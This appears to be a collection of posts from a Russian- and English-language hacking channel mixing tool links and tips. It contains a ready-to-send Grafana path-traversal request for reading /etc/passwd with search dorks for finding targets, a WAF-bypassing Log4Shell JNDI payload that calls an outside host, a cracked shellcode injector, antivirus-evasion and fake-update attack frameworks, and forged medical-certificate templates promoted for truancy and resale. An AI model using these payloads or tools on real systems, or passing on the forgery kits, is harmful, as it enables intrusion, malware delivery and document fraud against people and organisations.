​​📄 Несанкционированное чтение файлов в Grafana (0day)

Похоже, что новый 0day LFI в Grafana существует благодаря плагину grafana-clock-panel. Достаточно отправить GET запрос вида:

GET /public/plugins/grafana-clock-panel/../../../../../../../etc/passwd

Тем временем, найти Grafana можно с помощью дорка для ZoomEye:

app:"Grafana"

Или в Shodan:

Grafana

—————————

UPD:

Работает и через другие плагины в /public/plugins/*

#web #lfi #0day

Shellter Pro v.3.5, разблокированная версия

Shellter - это инструмент для динамического внедрения шелл-кода и первый из когда-либо созданных по-настоящему динамический PE-инфектор. Его можно использовать для внедрения шелл-кода в собственные приложения Windows (в настоящее время только 32-битные приложения). Шелл-код может быть вашим или созданным с помощью фреймворка, например Metasploit.

Как это работает
https://bit.ly/3pN32d4

Как пользоваться
https://bit.ly/3pKzahr

YouTube
https://bit.ly/3oCC7kE

# вредоносное ПО # инструменты

Shellter Pro v.3.5, unlocked version

Snap-Scraper

Snap Scraper enables users to download media uploaded to Snapchat's Snap Map using a set of latitude and longitude coordinates.

https://github.com/rhematt/Snap-Scraper

Sitadel - Web Application #Security Scanner

Sitadel is basically an update for WAScan making it compatible for python >= 3.4 It allows more flexibility for you to write new modules and implement new features :

▫️ Frontend framework detection
▫️ Content Delivery Network detection
▫️ Define Risk Level to allow for scans
▫️ Plugin system
▫️ Docker image available to build and run

https://github.com/shenril/Sitadel

Kali Tools — список инструментов Kali Linux и подробные инструкции по их применению.

Искал описание команды "shred", а в итоге наткнулся на целую энциклопедию по Kali Linux. Список инструментов следующий:

— Сбор информации
— Анализ уязвимостей
— Беспроводные атаки
— Веб приложения
— Криминалистические инструменты
— Стресс-тестирование
— Инструменты эксплуатации
—Sniffing и Spoofing
— Атака на пароли
— Поддержка доступа
— Взлом оборудования
— Обратная инженерия
— Анонимность
— Инструменты по составлению отчётов
— Уязвимые среды и программы для тренировки
— Шифрование данных и антикриминалистика

Все описано максимально подробно. Инструкции меня очень впечатлили. Если вы хотели изучить Kali Linux, но не знали с чего начать — это однозначно ваш шанс!

#сайт #сервис #взлом #анонимность

#слив

PSD-шаблон медицинской справки Республики Беларусь 🇧🇾

В данном архиве содержится всё для создания справки, а именно: инструкция, образец, шрифты и сам шаблон для Photoshop. Устанавливаем шрифты, закидываем шаблон в фотошоп и заполняем справку.

Теперь вы можете "официально" прогуливать школу или даже подзаработать продавая справки в чатах услуг а-ля Lolz Team.

Скриншот
Пароль на архив: @mamontyatina

#слив

PSD-шаблон медицинской справки Узбекистана 🇺🇿

В данном архиве содержится всё для создания справки, а именно: инструкция, образец, шрифты и сам шаблон для Photoshop. Устанавливаем шрифты, закидываем шаблон в фотошоп и заполняем справку.

Теперь вы можете "официально" прогуливать школу или даже подзаработать продавая справки в чатах услуг а-ля Lolz Team.

Скриншот
Пароль на архив: @mamontyatina

Malware using LOG4J exploit:)

PWD - infected

Found a bypass working for a few WAF

${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}

Good luck 🤞🏻
#log4j #Log4Shell #log4jRCE #bugbountytip

nse-log4shell

#Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload.

https://github.com/Diverto/nse-log4shell

#log4j2 #log4jRCE #log4jRCE #bugbounty

log4j-payload-generator

https://github.com/woodpecker-appstore/log4j-payload-generator

#log4j2 #log4jRCE #log4jRCE #bugbounty

Evilgrade

Modular Framework To Take Advantage Of Poor Upgrade Implementations By Injecting Fake Updates.

Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules.

Easy to set up new settings, and has an autoconfiguration when new binary agents are set.
When should I use evilgrade?

This framework comes into play when the attacker is able to make hostname redirections (manipulation of victim's dns traffic), and such thing can be done on 2 scenarios:

Internal scenery:
1. Internal DNS access
2. ARP spoofing
3. DNS Cache Poisoning
4. DHCP spoofing
5. TCP hijacking
6. Wi-Fi Access Point impersonation
External scenery:
1. Internal DNS access
2. DNS Cache Poisoning
How does it work?
Evilgrade works with modules, in each module there's an implemented structure which is needed to emulate a fake update for an specific application/system.

https://github.com/infobyte/evilgrade

CryptPad - приватный аналог Google Docs (с шифрованием).

Многие используют в повседневной жизни Google Docs, так как он практичен, все хранится в облаке и можно зайти и просмотреть нужные данные с любого устройства. Это все замечательно, но есть один нюанс - все ваши данные хранятся на Google серверах.

Но, как всегда есть альтернатива - CryptPad. Это онлайн коллаборативный редактор, котоpый взаимодействует с данными только в зашифрованном виде, а для разрешения конфликтов правoк использует блокчейн. Регистрация бесплатная, отлично работает из под Tor. По функционалу не уступает Google Docs.

Bypass AV & Advanced XDR solutions

Mortar Loader is able to bypass modern anti-virus products and advanced XDR solutions and it has been tested and confirmed bypass for the following:

— Kaspersky
— ESET
— Malewarebytes
— Mcafee
— Cortex XDR
— Windows defender
— Cylance

Research:
https://0xsp.com/security%20research%20&%20development%20(SRD)/defeat-the-castle-bypass-av-advanced-xdr-solutions

Source:
https://github.com/0xsp-SRD/mortar

#av #xdr #evasion #redteam

Netsparker Standard 6.2.1.33642 - 14 December 2021

Added Out of Band Code Evaluation (Log4j) a.k.a. Log4Shell detection support.

VirusTotal - https://www.virustotal.com/gui/file/e94ff1dd74e96d97754e155733d2dd789feb83fed2e56d087cbfb273fa5d6c9c

changelog - https://www.netsparker.com/web-vulnerability-scanner/changelog/

#vuln #scanner

Как найди адрес почты по фамилии и имени

1. Открой эту таблицу Google
2. Выбери файл > копировать
3. В поле для ввода ФИО укажи что известно
4. Укажи в поле domain популярный почтовый сервис, пример: gmail.com, можно yandex.ru, mail.ru, rambler.ru, и yahoo.com
5. Наводи на адреса и смотри на картинки профиля.

Адрес НЕ существует если у профиля картинка со светло-голубым фоном.

Если не появляется окно с профилем, то обнови страницу

​​Anon starter pack V.2.

Продолжаю выкладывать подборки инструментов для анонов.

1. OnionShare 2.3.1 — утилита с открытым исходным кодом, обеспечивающая безопасный и анонимный обмен файлами любого размера.

2. dnscrypt-proxy — гибкая служба DNS прокси с поддержкой DNSCrypt, DNS-over-HTTPS, и Anonymized DNSCrypt, relay-протокола, который скрывает реальный IP адрес пользователя.

3. Scrambled Exif — приложение для удаления метаданных с фотографий перед их отправкой. Для пользователей Android.

4. Tribler — торрент-клиент, который позволяет скачивать файлы через цепочку серверов-посредников, подобно тому, как это происходит в сети Tor.

5. Dust — плюс один безопасный мессенджер с Е2Е шифрованием сообщений. Не хранит сообщения на смартфоне.

6. Orchid — VPN-сервис нового поколения, использующий блокчейн технологию и смарт контракты.

7. OrganicMaps — релиз форка Maps.me с открытым кодом. Ориентирован на приватность.

#приложение #анонимность #софт